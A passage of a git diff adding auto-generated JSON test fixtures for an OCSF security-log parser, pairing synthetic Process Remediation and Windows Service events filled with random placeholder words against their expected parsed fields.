\"A74A78AF4E994F8C5ADE1098C677DEE43370A2B898524B0730EBFF42FA2C8359\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": false}, \"user\": {\"name\": \"Royal\", \"type\": \"eclipse\", \"uid\": 
\"223c92ee-a02f-11ef-b37d-0242ac110007\", \"org\": {\"name\": \"races obtaining business\", \"uid\": \"223c9f6e-a02f-11ef-80ed-0242ac110007\", \"ou_name\": \"larger phones hotel\", \"ou_uid\": \"223ca72a-a02f-11ef-b597-0242ac110007\"}, \"type_id\": 99, \"account\": {\"name\": \"execution implemented contributions\", \"type\": \"AWS Account\", \"uid\": \"223cb300-a02f-11ef-a109-0242ac110007\", \"type_id\": 10}, \"ldap_person\": {\"location\": {\"desc\": \"Senegal, Republic of\", \"city\": \"Barely vpn\", \"country\": \"SN\", \"coordinates\": [-6.1769, -23.2664], \"continent\": \"Africa\"}, \"given_name\": \"oven registrar consultant\", \"ldap_cn\": \"insulin convicted posted\", \"modified_time\": 1731330977010}}, \"tid\": 28, \"uid\": \"223d09cc-a02f-11ef-88a8-0242ac110007\", \"cmd_line\": \"cologne preventing pvc\", \"created_time\": 1731330977010, \"integrity\": \"tears\", \"integrity_id\": 99, \"parent_process\": {\"pid\": 58, \"file\": {\"name\": \"concept.tar\", \"type\": \"Regular File\", \"path\": \"aging socks soc/traditions.nes/concept.tar\", \"modifier\": {\"name\": \"Mai\", \"type\": \"mineral\", \"uid\": \"223d2b96-a02f-11ef-a466-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"fitting remembered advertiser\", \"type\": \"Linux Account\", \"uid\": \"223d378a-a02f-11ef-a93b-0242ac110007\", \"type_id\": 9}, \"credential_uid\": \"223d4086-a02f-11ef-aae8-0242ac110007\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"uid_alt\": \"chevrolet header sensitive\"}, \"uid\": \"223d47d4-a02f-11ef-80dd-0242ac110007\", \"ext\": \"finnish quotations trigger\", \"type_id\": 1, \"parent_folder\": \"aging socks soc/traditions.nes\", \"hashes\": [{\"value\": \"CCF8B7F3C1B91940CEA0982813BDECBB4177E02F8485991FF6F5F1ED5AEB7448BB931BD088B4617001768303ECEE51E3D61A3CC7369BA9EEF3C965E865EFEA4A\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Clubs\", \"type\": \"Unknown\", \"uid\": \"223d59ae-a02f-11ef-8620-0242ac110007\", 
\"type_id\": 0, \"risk_score\": 1, \"uid_alt\": \"quebec robertson slovak\"}, \"tid\": 22, \"uid\": \"223d673c-a02f-11ef-9f3c-0242ac110007\", \"cmd_line\": \"barnes outlined alabama\", \"created_time\": 1731330977013, \"parent_process\": {\"name\": \"Weapons\", \"pid\": 16, \"file\": {\"name\": \"pale.odt\", \"owner\": {\"name\": \"Waiver\", \"type\": \"carroll\", \"type_id\": 99, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 13}, \"type\": \"Character Device\", \"path\": \"pupils demonstrated spam/constitution.obj/pale.odt\", \"ext\": \"intl hip entry\", \"type_id\": 3, \"company_name\": \"Lucas Emerald\", \"parent_folder\": \"pupils demonstrated spam/constitution.obj\", \"hashes\": [{\"value\": \"8DF60FF96BFECD59DE3F802675A05912\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"149D479F6A59E992D99E894B589A22B63E7F357049D6B573DA7AAD6DB5584F44\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"security_descriptor\": \"decade prepared deleted\", \"xattributes\": {}}, \"user\": {\"name\": \"Gbp\", \"domain\": \"cathedral faces lovers\", \"uid\": \"223dc06a-a02f-11ef-8a14-0242ac110007\", \"full_name\": \"Bryan Yasmine\", \"risk_score\": 94}, \"uid\": \"223dc7f4-a02f-11ef-850b-0242ac110007\", \"cmd_line\": \"religious membership rb\", \"created_time\": 1731330977015, \"parent_process\": {\"name\": \"Invite\", \"pid\": 19, \"file\": {\"name\": \"aggressive.icns\", \"type\": \"Block Device\", \"path\": \"nyc runtime slip/ballot.thm/aggressive.icns\", \"desc\": \"ease ill executed\", \"ext\": \"malpractice road end\", \"type_id\": 4, \"mime_type\": \"income/poison\", \"parent_folder\": \"nyc runtime slip/ballot.thm\", \"hashes\": [{\"value\": \"037AEAEAF4BBF26DDABE7256A8294DC52DA48D575A1247B5C2598C47DE7AEBAB\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"C63B81E57E6869E3358411F7CCE3A2FA7BBE6FE5C1C54E3B4FDCD214F77082948C4A05C49CF7AF90CB5D0F112840C2A2B7715C80A07CF8511D608E1546DB6AC1\", \"algorithm\": 
\"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731330977016}, \"user\": {\"type\": \"User\", \"uid\": \"223decca-a02f-11ef-ab3c-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"cost_center\": \"motion saudi unix\", \"deleted_time\": 1731330977016, \"employee_uid\": \"223df7ba-a02f-11ef-8947-0242ac110007\", \"hire_time\": 1731330977016, \"last_login_time\": 1731330977016, \"ldap_dn\": \"table silent possibly\", \"surname\": \"alone tongue emotional\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1}, \"uid\": \"223dff76-a02f-11ef-b8d3-0242ac110007\", \"loaded_modules\": [\"/penguin/celebration/epson/lenders/with.uue\", \"/prefer/motherboard/traveling/factors/lawyer.tmp\"], \"cmd_line\": \"except routing crowd\", \"created_time\": 1731330977017, \"sandbox\": \"mechanisms suppose founded\"}}, \"sandbox\": \"tide oral independent\"}}}, \"terminated_time\": 1731330977017}}, \"xattributes\": {}}, \"status\": \"Unknown\", \"time\": 1731330976994, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"appeals discrete crash\", \"version\": \"1.3.0\", \"uid\": \"223a5696-a02f-11ef-ac80-0242ac110007\", \"vendor_name\": \"license push emperor\"}, \"sequence\": 26, \"profiles\": [], \"log_name\": \"ideal extended offers\", \"log_provider\": \"seller deserve sharing\", \"original_time\": \"alfred invitations speaking\", \"tenant_uid\": \"223a5fec-a02f-11ef-af39-0242ac110007\"}, \"severity\": \"Critical\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700304, \"type_name\": \"Process Remediation Activity: Harden\", \"observables\": [{\"name\": \"uploaded bear will\", \"type\": \"Subnet\", \"type_id\": 12}, {\"name\": \"italic quantitative keno\", \"type\": \"Geo Location\", \"type_id\": 26}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 64, \"activity_name\": \"Harden\", \"command_uid\": \"223ab6e0-a02f-11ef-9ffc-0242ac110007\", \"countermeasures\": 
[{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"223a6fdc-a02f-11ef-a601-0242ac110007\"}, \"d3f_technique\": {\"name\": \"columbus sync taken\", \"uid\": \"223a80c6-a02f-11ef-9766-0242ac110007\"}}], \"enrichments\": [{\"data\": \"trackback\", \"name\": \"natural segment seattle\", \"value\": \"rebecca stack obtain\", \"created_time\": 1731330976994, \"provider\": \"shall surplus transparency\", \"reputation\": {\"base_score\": 63.125, \"provider\": \"czech meter kinda\", \"score\": \"Possibly Malicious\", \"score_id\": 8}, \"src_url\": \"employees\"}, {\"data\": \"academics\", \"name\": \"todd earliest quick\", \"type\": \"older complicated mails\", \"value\": \"issued dressed latina\", \"created_time\": 1731330976994, \"provider\": \"tube subtle austin\", \"short_desc\": \"summer concentration specific\", \"src_url\": \"domestic\"}], \"severity_id\": 5, \"status_code\": \"malawi\", \"status_detail\": \"odd lib station\", \"status_id\": 0}", + "event": { + "action": "harden", + "category": [], + "outcome": "unknown", + "provider": "seller deserve sharing", + "reason": "heaven country sugar", + "sequence": 26, + "severity": 5, + "type": [] + }, + "@timestamp": "2024-11-11T13:16:16.994000Z", + "file": { + "directory": "guilty different comply/expects.accdb", + "hash": { + "sha256": "EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698", + "tlsh": "6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0" + }, + "name": "earliest.pdb", + "owner": "Tee", + "path": "guilty different comply/expects.accdb/earliest.pdb", + "type": "Regular File", + "uid": "223ad95e-a02f-11ef-8523-0242ac110007" + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Harden", + "class_name": "Process Remediation Activity", + "class_uid": 7003, + "process": { + "parent": { + "user": { + "email": "Li@scientific.travel", + "full_name": "Anita Rosanna" + } + } + } + }, + "process": { + "command_line": 
"guided stretch phrases", + "name": "Success", + "parent": { + "command_line": "suits chris sega", + "entity_id": "223b4aa6-a02f-11ef-9d39-0242ac110007", + "name": "Em", + "pid": 60, + "start": "2024-11-11T13:16:16.999000Z", + "user": { + "id": [ + "223b30c0-a02f-11ef-87cb-0242ac110007" + ], + "name": "Membership" + } + }, + "pid": 94, + "start": "2024-11-11T13:16:16.996000Z", + "user": { + "id": [ + "223aed7c-a02f-11ef-943c-0242ac110007" + ], + "name": "Livestock" + } + }, + "related": { + "hash": [ + "EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698" + ], + "user": [ + "Tee" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_process_remediation_activity_2.json b/OCSF/ocsf/tests/generated_process_remediation_activity_2.json new file mode 100644 index 000000000..899ec4fb5 --- /dev/null +++ b/OCSF/ocsf/tests/generated_process_remediation_activity_2.json 
@@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"message\": \"sellers besides hl\", \"process\": {\"name\": \"Prince\", \"pid\": 7, \"file\": {\"name\": \"propose.pptx\", \"type\": \"Folder\", \"signature\": {\"algorithm\": \"DSA\", \"algorithm_id\": 1}, \"modifier\": {\"name\": \"Stylish\", \"type\": \"Unknown\", \"uid\": \"28d3fd18-a02f-11ef-af24-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"employee_uid\": \"28d42ee6-a02f-11ef-9279-0242ac110007\"}, \"risk_level\": \"loving\", \"risk_level_id\": 99, \"risk_score\": 0}, \"desc\": \"ceiling patches side\", \"uid\": \"28d43742-a02f-11ef-9ec1-0242ac110007\", \"type_id\": 2, \"creator\": {\"name\": \"Remained\", \"type\": \"latino\", \"domain\": \"rest investor soa\", \"uid\": \"28d473e2-a02f-11ef-9ccb-0242ac110007\", \"type_id\": 99}, \"hashes\": [{\"value\": \"89759E1284E2479B991D2669DE104942\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Pork\", \"type\": \"User\", \"uid\": \"28d4888c-a02f-11ef-82fc-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"location\": {\"desc\": \"Dominica, Commonwealth of\", \"city\": \"Discrimination fri\", \"country\": \"DM\", \"coordinates\": [92.1251, 34.7562], \"continent\": \"North America\"}, \"manager\": {\"name\": \"Idol\", \"type\": \"Admin\", \"uid\": \"28d4cb94-a02f-11ef-b90f-0242ac110007\", \"type_id\": 2, \"risk_level\": \"gothic smithsonian garmin\"}, \"employee_uid\": \"28d4d544-a02f-11ef-ad52-0242ac110007\", \"given_name\": \"includes livestock index\", \"job_title\": \"strategies compliant references\", \"leave_time\": 1731330988071, \"modified_time\": 1731330988071}, \"uid_alt\": \"control gary baking\"}, \"tid\": 47, \"uid\": \"28d4de90-a02f-11ef-98b9-0242ac110007\", \"cmd_line\": \"characters vocal tracy\", \"created_time\": 1731330988072, 
\"parent_process\": {\"pid\": 40, \"file\": {\"attributes\": 79, \"name\": \"irc.com\", \"type\": \"Unknown\", \"path\": \"finding possibilities clinton/cached.asf/irc.com\", \"signature\": {\"state\": \"Revoked\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"external compiler heated\", \"issuer\": \"appears hungry drive\", \"fingerprints\": [{\"value\": \"63F62E392F7025A4167DD1EC5A9EF966C16729FDC201CB89B807A60D5332A7A9473433A7AE2CD8C213C47520CFCDF970F3EA2DFEF02D04EA5B66610BDEA8D497\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731330988072, \"expiration_time\": 1731330988072, \"serial_number\": \"configuration deadline calgary\"}, \"algorithm\": \"fails\", \"algorithm_id\": 99, \"state_id\": 3}, \"modifier\": {\"type\": \"User\", \"uid\": \"28d51ef0-a02f-11ef-92f3-0242ac110007\", \"type_id\": 1, \"email_addr\": \"Yu@monroe.mil\"}, \"ext\": \"consequences years ecology\", \"type_id\": 0, \"parent_folder\": \"finding possibilities clinton/cached.asf\", \"hashes\": [{\"value\": \"A6426312E27AB008F4EDC3204E03FD5B383EA1C8B4A4567E748A42CEF025EF43A89764E99A4D39740137733A152598B7050663A2C427F7874F331D0609FD3CB8\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"EACCA81A25CF539B76C8A39BB632EC20C918EF9EFD1E73B8FDEB68C67765DE58E5925C523C695E88ACB94E43C38BA494EFF4D1A415A91C332930A3FB12A5AF27\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"type\": \"Unknown\", \"uid\": \"28d53156-a02f-11ef-aa73-0242ac110007\", \"type_id\": 0}, \"tid\": 51, \"uid\": \"28d53f16-a02f-11ef-9a1e-0242ac110007\", \"cmd_line\": \"commission relying steady\", \"created_time\": 1731330988074, \"integrity\": \"Medium\", \"integrity_id\": 3, \"parent_process\": {\"pid\": 56, \"session\": {\"terminal\": \"occur match lan\", \"uid\": \"28d58f84-a02f-11ef-8740-0242ac110007\", \"created_time\": 1731330988076, \"expiration_reason\": \"therapeutic midlands visited\", \"is_remote\": true}, \"file\": 
{\"attributes\": 47, \"name\": \"anymore.tar\", \"owner\": {\"name\": \"Halifax\", \"type\": \"User\", \"type_id\": 1, \"risk_level\": \"Medium\", \"risk_level_id\": 2}, \"type\": \"Regular File\", \"uid\": \"28d5c4cc-a02f-11ef-8469-0242ac110007\", \"type_id\": 1, \"hashes\": [{\"value\": \"F573102FF9F85CEA0795FA811907D06B74C86CDE18D2999A2070523EC27478C2F15F634D3D0509B660995C0695E665C4A124CD5F1F657FD9E26AC679200F1425\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"modified_time\": 1731330988078, \"security_descriptor\": \"realtors shoulder kilometers\", \"xattributes\": {}}, \"user\": {\"name\": \"Figured\", \"type\": \"System\", \"uid\": \"28d5fac8-a02f-11ef-895f-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"28d602ac-a02f-11ef-9c04-0242ac110007\", \"email_addr\": \"Darla@movies.org\"}, \"uid\": \"28d63402-a02f-11ef-b1e9-0242ac110007\", \"cmd_line\": \"overview statutes valves\", \"created_time\": 1731330988080, \"integrity\": \"losses renewal aquatic\"}}}, \"status\": \"dynamic acer dollar\", \"time\": 1731330988061, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"diamond aaa screensavers\", \"version\": \"1.3.0\", \"path\": \"mem anthropology notifications\", \"uid\": \"28d1a536-a02f-11ef-92c5-0242ac110007\", \"cpe_name\": \"quebec labs assume\", \"vendor_name\": \"professionals subsidiary maria\"}, \"labels\": [\"bandwidth\", \"jeremy\"], \"profiles\": [], \"event_code\": \"digit\", \"log_name\": \"bosnia blind seq\", \"log_provider\": \"arg handed dock\", \"log_version\": \"congratulations solution vancouver\", \"original_time\": \"famous thinking males\"}, \"scan\": {\"name\": \"soon reproduce paragraph\", \"type\": \"Updated Content\", \"uid\": \"28d22ac4-a02f-11ef-a4e4-0242ac110007\", \"type_id\": 3}, \"severity\": \"Informational\", \"category_uid\": 7, \"activity_id\": 0, \"type_uid\": 700300, \"type_name\": \"Process Remediation Activity: Unknown\", \"observables\": [{\"name\": \"targeted arlington mediterranean\", 
\"type\": \"Geo Location\", \"type_id\": 26, \"reputation\": {\"base_score\": 94.8029, \"provider\": \"lucy printing mrna\", \"score\": \"turkish\", \"score_id\": 99}}, {\"name\": \"payment traditions proudly\", \"type\": \"CVE Object: uid\", \"type_id\": 18}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 14, \"activity_name\": \"Unknown\", \"command_uid\": \"28d355b6-a02f-11ef-b6de-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d23d02-a02f-11ef-97ab-0242ac110007\"}, \"d3f_technique\": {\"name\": \"dosage cart but\", \"uid\": \"28d29040-a02f-11ef-b946-0242ac110007\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d29c02-a02f-11ef-9d6f-0242ac110007\"}, \"d3f_technique\": {\"uid\": \"28d2cb6e-a02f-11ef-a981-0242ac110007\", \"src_url\": \"amsterdam\"}}], \"severity_id\": 1, \"status_detail\": \"bow euros scsi\"}" + }, + "expected": { + "message": "{\"message\": \"sellers besides hl\", \"process\": {\"name\": \"Prince\", \"pid\": 7, \"file\": {\"name\": \"propose.pptx\", \"type\": \"Folder\", \"signature\": {\"algorithm\": \"DSA\", \"algorithm_id\": 1}, \"modifier\": {\"name\": \"Stylish\", \"type\": \"Unknown\", \"uid\": \"28d3fd18-a02f-11ef-af24-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"employee_uid\": \"28d42ee6-a02f-11ef-9279-0242ac110007\"}, \"risk_level\": \"loving\", \"risk_level_id\": 99, \"risk_score\": 0}, \"desc\": \"ceiling patches side\", \"uid\": \"28d43742-a02f-11ef-9ec1-0242ac110007\", \"type_id\": 2, \"creator\": {\"name\": \"Remained\", \"type\": \"latino\", \"domain\": \"rest investor soa\", \"uid\": \"28d473e2-a02f-11ef-9ccb-0242ac110007\", \"type_id\": 99}, \"hashes\": [{\"value\": \"89759E1284E2479B991D2669DE104942\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": 
\"C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Pork\", \"type\": \"User\", \"uid\": \"28d4888c-a02f-11ef-82fc-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"location\": {\"desc\": \"Dominica, Commonwealth of\", \"city\": \"Discrimination fri\", \"country\": \"DM\", \"coordinates\": [92.1251, 34.7562], \"continent\": \"North America\"}, \"manager\": {\"name\": \"Idol\", \"type\": \"Admin\", \"uid\": \"28d4cb94-a02f-11ef-b90f-0242ac110007\", \"type_id\": 2, \"risk_level\": \"gothic smithsonian garmin\"}, \"employee_uid\": \"28d4d544-a02f-11ef-ad52-0242ac110007\", \"given_name\": \"includes livestock index\", \"job_title\": \"strategies compliant references\", \"leave_time\": 1731330988071, \"modified_time\": 1731330988071}, \"uid_alt\": \"control gary baking\"}, \"tid\": 47, \"uid\": \"28d4de90-a02f-11ef-98b9-0242ac110007\", \"cmd_line\": \"characters vocal tracy\", \"created_time\": 1731330988072, \"parent_process\": {\"pid\": 40, \"file\": {\"attributes\": 79, \"name\": \"irc.com\", \"type\": \"Unknown\", \"path\": \"finding possibilities clinton/cached.asf/irc.com\", \"signature\": {\"state\": \"Revoked\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"external compiler heated\", \"issuer\": \"appears hungry drive\", \"fingerprints\": [{\"value\": \"63F62E392F7025A4167DD1EC5A9EF966C16729FDC201CB89B807A60D5332A7A9473433A7AE2CD8C213C47520CFCDF970F3EA2DFEF02D04EA5B66610BDEA8D497\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731330988072, \"expiration_time\": 1731330988072, \"serial_number\": \"configuration deadline calgary\"}, \"algorithm\": \"fails\", \"algorithm_id\": 99, \"state_id\": 3}, \"modifier\": {\"type\": \"User\", \"uid\": \"28d51ef0-a02f-11ef-92f3-0242ac110007\", \"type_id\": 1, \"email_addr\": \"Yu@monroe.mil\"}, \"ext\": 
\"consequences years ecology\", \"type_id\": 0, \"parent_folder\": \"finding possibilities clinton/cached.asf\", \"hashes\": [{\"value\": \"A6426312E27AB008F4EDC3204E03FD5B383EA1C8B4A4567E748A42CEF025EF43A89764E99A4D39740137733A152598B7050663A2C427F7874F331D0609FD3CB8\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"EACCA81A25CF539B76C8A39BB632EC20C918EF9EFD1E73B8FDEB68C67765DE58E5925C523C695E88ACB94E43C38BA494EFF4D1A415A91C332930A3FB12A5AF27\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"type\": \"Unknown\", \"uid\": \"28d53156-a02f-11ef-aa73-0242ac110007\", \"type_id\": 0}, \"tid\": 51, \"uid\": \"28d53f16-a02f-11ef-9a1e-0242ac110007\", \"cmd_line\": \"commission relying steady\", \"created_time\": 1731330988074, \"integrity\": \"Medium\", \"integrity_id\": 3, \"parent_process\": {\"pid\": 56, \"session\": {\"terminal\": \"occur match lan\", \"uid\": \"28d58f84-a02f-11ef-8740-0242ac110007\", \"created_time\": 1731330988076, \"expiration_reason\": \"therapeutic midlands visited\", \"is_remote\": true}, \"file\": {\"attributes\": 47, \"name\": \"anymore.tar\", \"owner\": {\"name\": \"Halifax\", \"type\": \"User\", \"type_id\": 1, \"risk_level\": \"Medium\", \"risk_level_id\": 2}, \"type\": \"Regular File\", \"uid\": \"28d5c4cc-a02f-11ef-8469-0242ac110007\", \"type_id\": 1, \"hashes\": [{\"value\": \"F573102FF9F85CEA0795FA811907D06B74C86CDE18D2999A2070523EC27478C2F15F634D3D0509B660995C0695E665C4A124CD5F1F657FD9E26AC679200F1425\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"modified_time\": 1731330988078, \"security_descriptor\": \"realtors shoulder kilometers\", \"xattributes\": {}}, \"user\": {\"name\": \"Figured\", \"type\": \"System\", \"uid\": \"28d5fac8-a02f-11ef-895f-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"28d602ac-a02f-11ef-9c04-0242ac110007\", \"email_addr\": \"Darla@movies.org\"}, \"uid\": \"28d63402-a02f-11ef-b1e9-0242ac110007\", \"cmd_line\": \"overview statutes valves\", \"created_time\": 
1731330988080, \"integrity\": \"losses renewal aquatic\"}}}, \"status\": \"dynamic acer dollar\", \"time\": 1731330988061, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"diamond aaa screensavers\", \"version\": \"1.3.0\", \"path\": \"mem anthropology notifications\", \"uid\": \"28d1a536-a02f-11ef-92c5-0242ac110007\", \"cpe_name\": \"quebec labs assume\", \"vendor_name\": \"professionals subsidiary maria\"}, \"labels\": [\"bandwidth\", \"jeremy\"], \"profiles\": [], \"event_code\": \"digit\", \"log_name\": \"bosnia blind seq\", \"log_provider\": \"arg handed dock\", \"log_version\": \"congratulations solution vancouver\", \"original_time\": \"famous thinking males\"}, \"scan\": {\"name\": \"soon reproduce paragraph\", \"type\": \"Updated Content\", \"uid\": \"28d22ac4-a02f-11ef-a4e4-0242ac110007\", \"type_id\": 3}, \"severity\": \"Informational\", \"category_uid\": 7, \"activity_id\": 0, \"type_uid\": 700300, \"type_name\": \"Process Remediation Activity: Unknown\", \"observables\": [{\"name\": \"targeted arlington mediterranean\", \"type\": \"Geo Location\", \"type_id\": 26, \"reputation\": {\"base_score\": 94.8029, \"provider\": \"lucy printing mrna\", \"score\": \"turkish\", \"score_id\": 99}}, {\"name\": \"payment traditions proudly\", \"type\": \"CVE Object: uid\", \"type_id\": 18}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 14, \"activity_name\": \"Unknown\", \"command_uid\": \"28d355b6-a02f-11ef-b6de-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d23d02-a02f-11ef-97ab-0242ac110007\"}, \"d3f_technique\": {\"name\": \"dosage cart but\", \"uid\": \"28d29040-a02f-11ef-b946-0242ac110007\"}}, {\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"28d29c02-a02f-11ef-9d6f-0242ac110007\"}, \"d3f_technique\": {\"uid\": \"28d2cb6e-a02f-11ef-a981-0242ac110007\", \"src_url\": \"amsterdam\"}}], \"severity_id\": 1, 
\"status_detail\": \"bow euros scsi\"}", + "event": { + "action": "unknown", + "category": [], + "code": "digit", + "provider": "arg handed dock", + "reason": "sellers besides hl", + "severity": 1, + "type": [] + }, + "@timestamp": "2024-11-11T13:16:28.061000Z", + "file": { + "hash": { + "md5": "89759E1284E2479B991D2669DE104942", + "ssdeep": "C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64" + }, + "inode": "28d43742-a02f-11ef-9ec1-0242ac110007", + "name": "propose.pptx", + "type": "Folder" + }, + "ocsf": { + "activity_id": 0, + "activity_name": "Unknown", + "class_name": "Process Remediation Activity", + "class_uid": 7003 + }, + "process": { + "command_line": "characters vocal tracy", + "entity_id": "28d4de90-a02f-11ef-98b9-0242ac110007", + "name": "Prince", + "parent": { + "command_line": "commission relying steady", + "entity_id": "28d53f16-a02f-11ef-9a1e-0242ac110007", + "pid": 40, + "start": "2024-11-11T13:16:28.074000Z", + "thread": { + "id": 51 + }, + "user": { + "id": [ + "28d53156-a02f-11ef-aa73-0242ac110007" + ] + } + }, + "pid": 7, + "start": "2024-11-11T13:16:28.072000Z", + "thread": { + "id": 47 + }, + "user": { + "id": [ + "28d4888c-a02f-11ef-82fc-0242ac110007" + ], + "name": "Pork" + } + }, + "related": { + "hash": [ + "89759E1284E2479B991D2669DE104942", + "C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_windows_service_1.json b/OCSF/ocsf/tests/generated_windows_service_1.json new file mode 100644 index 000000000..c474de045 --- /dev/null +++ b/OCSF/ocsf/tests/generated_windows_service_1.json 
@@ -0,0 +1,97 @@ +{ + "input": { + "message": "{\"message\": \"gear technologies garlic\", \"status\": \"Failure\", \"time\": 1731399707936, \"device\": {\"owner\": {\"name\": \"Paper\", \"type\": \"Unknown\", \"domain\": \"comfort pick casino\", \"uid\": \"29093ba4-a0cf-11ef-a993-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"2909420c-a0cf-11ef-ae57-0242ac110007\"}, \"type\": \"IDS\", \"uid\": \"29092d44-a0cf-11ef-8baa-0242ac110007\", \"type_id\": 13, \"imei\": \"polyester verified charlie\", \"instance_uid\": \"29091d04-a0cf-11ef-8935-0242ac110007\", \"interface_name\": \"fonts roller schema\", \"interface_uid\": \"290925c4-a0cf-11ef-83a0-0242ac110007\", \"is_managed\": true, \"network_interfaces\": [{\"name\": \"nickname museums symptoms\", \"type\": \"Unknown\", \"hostname\": \"influenced.museum\", \"mac\": \"25:15:EA:C3:5F:12:EF:E9\", \"type_id\": 0}, {\"name\": \"polar bm traveler\", \"type\": \"Wired\", \"hostname\": \"vegetarian.store\", \"mac\": \"87:8C:2:BD:DD:A8:43:3A\", \"type_id\": 1}], \"region\": \"provider nirvana absolute\", \"risk_level\": \"Critical\", \"risk_level_id\": 4}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"pokemon know retrieval\", \"version\": \"1.3.0\", \"path\": \"dolls vid representing\", \"uid\": \"290890b4-a0cf-11ef-b8db-0242ac110007\", \"vendor_name\": \"hide broken trademark\"}, \"profiles\": [], \"log_name\": \"cindy drives thin\", \"log_provider\": \"foo canada biodiversity\", \"original_time\": \"virus pure partly\", \"processed_time\": 1731399707888}, \"start_time\": 1731399707936, \"severity\": \"Medium\", \"category_uid\": 1, \"activity_id\": 4, \"type_uid\": 20100404, \"type_name\": \"Windows Service Activity: Stop\", \"observables\": [{\"name\": \"generation damages hawaii\", \"type\": \"Email\", \"value\": \"sale talking pairs\", \"type_id\": 22}, {\"name\": \"testimonials seventh smallest\", \"type\": \"MAC Address\", \"type_id\": 3}], \"category_name\": \"System Activity\", \"class_uid\": 
201004, \"class_name\": \"Windows Service Activity\", \"timezone_offset\": 72, \"activity_name\": \"Stop\", \"actor\": {\"process\": {\"name\": \"Don\", \"pid\": 38, \"file\": {\"name\": \"developmental.otf\", \"type\": \"Regular File\", \"path\": \"vg tunisia river/favorite.wsf/developmental.otf\", \"ext\": \"mike biography serial\", \"type_id\": 1, \"accessor\": {\"name\": \"Mathematical\", \"type\": \"Unknown\", \"domain\": \"touring wing sunglasses\", \"org\": {\"name\": \"battery met word\", \"uid\": \"29099612-a0cf-11ef-9f88-0242ac110007\", \"ou_name\": \"invitation olympus putting\"}, \"type_id\": 0, \"credential_uid\": \"29099f68-a0cf-11ef-ab1c-0242ac110007\", \"risk_level\": \"constitution missions steam\"}, \"parent_folder\": \"vg tunisia river/favorite.wsf\", \"confidentiality\": \"Top Secret\", \"confidentiality_id\": 4, \"hashes\": [{\"value\": \"9280AE13A255F18D841739D0D18222BB950C8FC7\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"security_descriptor\": \"gibson columbia refund\"}, \"user\": 